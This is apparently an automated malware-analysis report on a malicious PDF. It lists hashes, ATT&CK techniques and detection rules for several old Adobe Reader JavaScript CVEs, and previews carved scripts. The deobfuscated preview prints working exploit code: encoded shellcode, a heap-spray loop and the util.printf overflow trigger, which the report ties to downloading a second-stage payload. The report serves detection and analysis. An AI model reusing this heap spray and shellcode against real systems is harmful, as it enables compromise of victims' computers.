Malicious PDF — malware analysis report

Static analysis result for SHA-256 032a925e50018fbc…

Verdict: MALICIOUS
File type: PDF
Size: 118.6 KB
MD5: 6bc6a980528285785acf09bb54e24c0e
SHA-1: 54c15d0c6666447eadfc1d9b056a6c6294fa8e27
SHA-256: 032a925e50018fbc25666f1716693855c57a6c975137092fb038b666b860ad4e
Risk Score: 676

Malware Insights

MITRE ATT&CK

  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

This PDF file contains heavily obfuscated JavaScript that exploits multiple Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script is designed to download and execute a second-stage payload, as indicated by the ClamAV detection on an extracted artifact (Js.Exploit.Shellcode-18). The primary attack vector is exploitation for client execution via JavaScript.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (12)

  • media.newPlayer — CVE-2009-4324 (severity: critical; CVE match: exact; rule: CVE_2009_4324)
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 (severity: critical; CVE match: exact; rule: CVE_2009_0927)
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 (severity: critical; CVE match: exact; rule: CVE_2007_5659)
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 (severity: critical; CVE match: exact; rule: CVE_2008_2992)
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher (severity: critical; CVE match: likely; rule: PDF_PIDIEF_MULTI_CVE_DISPATCH)
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Pdf.Exploit.Agent-36086 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
  • Multi-CVE Adobe Reader JavaScript exploit kit (severity: critical; rule: PDF_ADOBE_READER_MULTI_CVE_JS_KIT)
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action (severity: low; 3 related findings; rule: PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (severity: critical; rule: PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Large comment-padded JavaScript eval stager (severity: high; rule: PDF_JS_LARGE_COMMENT_PADDED_EVAL)
    PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
  • Embedded JS stream (severity: low; rule: PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj0006_000.js
SHA-256: e94e222def07ef5e30d332c6bdb521804de5d0d21f1365daf32d25410def4099
Kind: pdf-javascript-stream
Source: PDF /JS object 6 at offset 0x143
Size: 626046 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 42 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
function cev(gVT){ /*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
... (truncated)
Filename: legacy_pdfkit_stage_000.js
SHA-256: 4373dfce8fe8a8d9f2081438eedd7a3f9b5598761e0277ac70751d2588c89b43
Kind: deobfuscated-js
Source: comment-padded substitution-hex decoded JavaScript at offset 0x143
Size: 10413 bytes
Detection: ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
function fix_it(yarsp,len)
{
	while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
	var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u9DFF%u0282%uF905%u3223%u9D05%u8982%u9145%u7209%u3019%u7209%u1C0D%u0246%u62F2%u897D%u26E9%u02CA%u9D05%u02E8%u136D%u0CCC%uF5E9%uFC1A%u938F%uEDEA%u7DCB%u6AE2%u5736%u5908%uA56D%uAEA0%uF5E2%u4B68%u758F%uD9EA%uBE8F%u6A6B%uD15E%uDF98%u716D%u0115%u7509%u039D%u9D05%u060B%u1E2E%u0669%u5D0E%uF3F7%uF36D%u76E7%uF505%u6BF5%uF46B%uFDD6%uB550%u5BDB%u5D0E%u868D%u9DFD%u0282%u6D8E%u5A39%u9D05%u6882%uF505%u46AB%uCAED%u4BEA%u92E8%u6AFC%uD68E%u5D61%u7DED%u0282%u1405%u2986%u7686%u0986%uE8C5%u8F73%u9D80%u0280%uCD05%uFDEA%u9D05%uFD82%uA950%u870F%u9905%u0282%uF755%u6882%u1005%u0207%u9D07%u5282%uC8FA%u8FBA%u9DB0%u0286%u3105%uC288%u6670%uC5CC%uB303%u7AE7%u5A60%u06C4%u9D05%u0282%u1888%u0682%u9D05%uCBB1%uCD54%u577D%uDD39%u868D%u9D85%u0282%u144D%u4EC7%u9D6D%u02C2%uF705%uFDC2%uD550%uC289%uF371%u470B%uF765%u6882%uF705%u6882%uF705%uFD82%uCD50%uC289%uC771%u02E8%u9D6D%u0282%uF701%u6882%u7405%u0228%u9D05%uFDD2%uC950%uC289%uDF71%u470B%u106D%u66C7%uF555%u4282%u9D05%u777D%u6265%u6AF7%uC8FA%u09DA%uE9C5%u8997%uF940%uC289%u9371%u777D%u6261%u62F7%uE8FA%uFDCE%uDD50%uD769%uE8FA%uFDCE%uD950%uCBA9%uCC44%u870F%u9905%u0282%u6255%u2ED7%u626F%u577D%uC835%uEE09%uE08E%u098A%uE9FA%u51C9%u438E%u89D4%uA176%u7609%uE536%uF181%u1653%u22F4%u6E06%uCBB1%uDC4C%u012F%uCBC6%uF4B1%u230A%u3A92%uE9D3%uC38A%u90CB%uF081%u7645%u3973%uC3FB%uE7F7%u165F%u8969%uB95F%uDF81%u1663%u498E%uC78E%u019E%u16D8%u8986%u5806%u59DC%u9FEE%uC2B1%u5F58%u0286%uCCED%uFD7D%uF5FA%u76F6%uA775%u2DAD%uEE64%u63EB%uED6B%u70ED%uE96B%u6BF0%uB375%u6DE1%uB268%u70F6%uF964%u2DE7%uFE3A%u33BF%uEE23%u66EB%uA938%u32B5%uFF36%u66BB%uA563%u66BB%uAA31%u61B7%uAB35%u30E7%uAB3C%u3AE0%uF863%u34E6%uAD67%u31E1%uBB37%u3FF1%u9D36%u0282%u0005");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;
	while(bigblock.length<spray){bigblock+=bigblock;}
	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);
	while(block.length+spray<0x40000){block=block+block+fillblock;}
	var mem_array=new Array();
	for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}
function collab_email()
{
	var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u9DFF%u0282%uF905%u3223%u9D05%u8982%u9145%u7209%u3019%u7209%u1C0D%u0246%u62F2%u897D%u26E9%u02CA%u9D05%u02E8%u136D%u0CCC%uF5E9%uFC1A%u938F%uEDEA%u7DCB%u6AE2%u5736%u5908%uA56D%uAEA0%uF5E2%u4B68%u758F%uD9EA%uBE8F%u6A6B%uD15E%uDF98%u716D%u0115%u7509%u039D%u9D05%u060B%u1E2E%u0669%u5D0E%uF3F7%uF36D%u76E7%uF505%u6BF5%uF46B%uFDD6%uB550%u5BDB%u5D0E%u868D%u9DFD%u0282%u6D8E%u5A39%u9D05%u6882%uF505%u46AB%uCAED%u4BEA%u92E8%u6AFC%uD68E%u5D61%u7DED%u0282%u1405%u2986%u7686%u0986%uE8C5%u8F73%u9D80%u0280%uCD05%uFDEA%u9D05%uFD82%uA950%u870F%u9905%u0282%uF755%u6882%u1005%u0207%u9D07%u5282%uC8FA%u8FBA%u9DB0%u0286%u3105%uC288%u6670%uC5CC%uB303%u7AE7%u5A60%u06C4%u9D05%u0282%u1888%u0682%u9D05%uCBB1%uCD54%u577D%uDD39%u868D%u9D85%u0282%u144D%u4EC7%u9D6D%u02C2%uF705%uFDC2%uD550%uC289%uF371%u470B%uF765%u6882%uF705%u6882%uF705%uFD82%uCD50%uC289%uC771%u02E8%u9D6D%u0282%uF701%u6882%u7405%u0228%u9D05%uFDD2%uC950%uC289%uDF71%u470B%u106D%u66C7%uF555%u4282%u9D05%u777D%u6265%u6AF7%uC8FA%u09DA%uE9C5%u8997%uF940%uC289%u9371%u777D%u6261%u62F7%uE8FA%uFDCE%uDD50%uD769%uE8FA%uFDCE%uD950%uCBA9%uCC44%u870F%u9905%u0282%u6255%u2ED7%u626F%u577D%uC835%uEE09%uE08E%u098A%uE9FA
... (truncated)